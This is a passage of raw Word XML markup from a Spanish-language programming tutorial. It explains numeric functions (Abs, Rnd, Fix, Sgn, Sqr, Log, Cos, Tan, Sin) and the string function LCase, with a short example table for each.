        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2682"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4,567"</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Abs(</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895"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right="121"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el valor -4,567. Tras aplicarle la funcion </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Abs</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene el valor 4,567.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="0"/>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tercera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rnd</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función devuelve un numero aleatorio decimal (0,33), y por eso es conveniente multiplicarlo por 100 y luego aplicarle la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Como vemos, se pueden pues mezclar y poner unas funciones dentro de otras sin problemas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8637" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2590"/>
        <w:gridCol w:w="6047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1185"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2590"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Randomize</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Fix(Rnd*100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="604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recibirá un numero aleatorio decimal que al multiplicarlo por 100 dará un numero aleatorio decimal con dos números enteros. Al aplicarle la función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ix se convertirá en un número aleatorio entero de dos cifras.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>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La cuarta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sgn</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función devuelve 1 si el signo del valor de Variable es positivo, -1 si es negativo y 0 si su valor es 0. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8329" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2670"/>
        <w:gridCol w:w="5659"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2670"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4,567"</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Sgn(</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65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el valor -4,567. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Sgn </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Variable, Variable2 obtiene el valor -1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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quinta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sqr</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función devuelve la raíz cuadrada de un número. Si el numero es negativo genera un error, y por eso es recomendable usar antes la funciona </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Abs</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8103" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2656"/>
        <w:gridCol w:w="5447"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2656"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4"</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Sqr(</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44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right="11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el valor 4. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Sqr </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> Variable, Variable2 obtiene el valor 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93" w:right="165"/>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xta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función devuelve el logaritmo natural de un numero, es decir el logaritmo en base </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2,718282) de un numero. Por eso es recomendable usar una división de logaritmos para hallar logaritmos de la base que queramos siguiendo el siguiente ejemplo, donde Variable es el numero al que se le aplica el logaritmo y 8 es la base de este (sustituye 8 por la base sobre la cual quieres operar):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="6149"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="698"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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64"</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Log(Variable) / Log(8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="5" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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el valor 64. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Log </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">a Variable con base </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>, Variable2 tiene el valor 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="497"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="double" w:sz="15" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="doub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0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="5"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bl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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s últimas funciones son </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cos</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Tan</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y</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Sin</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Estas funciones devuelven el coseno, la tangente y el seno respectivamente, de un número que tiene un valor que expresa el ángulo en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Radianes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">convertir </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>grados</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>radianes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, multiplique los grados por </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pi / 180</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para convertir los radianes en grados, multiplique los radianes por </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>180/pi</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="170" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3664"/>
        <w:gridCol w:w="5037"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="579"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3664" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="15" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4"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3,1415926535897932" Variable2 = </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Cos(Variable) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5038" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="3"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tiene el valor pi. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Cos </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a Variable, Variable2 obtiene el valor -1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="83"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="3" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="9" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="9"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bl>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as son, en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>definitiva</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> las funciones numéricas mas usadas, que dan mucho juego junto con las operaciones matemáticas vistas antes. A estas alturas, deberíais probar en intentar hacer un script donde tu pides la longitud de dos lados de un triangulo, y el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>programa, mediante Pitágoras, saca el tercero; pues es una muy buena práctic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Por otro lado, las cadenas que guardan las variables tienen varias funciones que las pueden modificar. Estas son:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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primera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>LCase</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función convierte toda una cadena a minúsculas. Si esta toda en minúsculas la deja como está. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2944"/>
        <w:gridCol w:w="5757"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2944"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LCase(</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75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right="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la cadena Hola. Tras aplicarle la función </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:u w:val="single" w:color="000000"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LCase</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 tiene “hola”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93" w:right="164"/>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gunda función es </w:t>
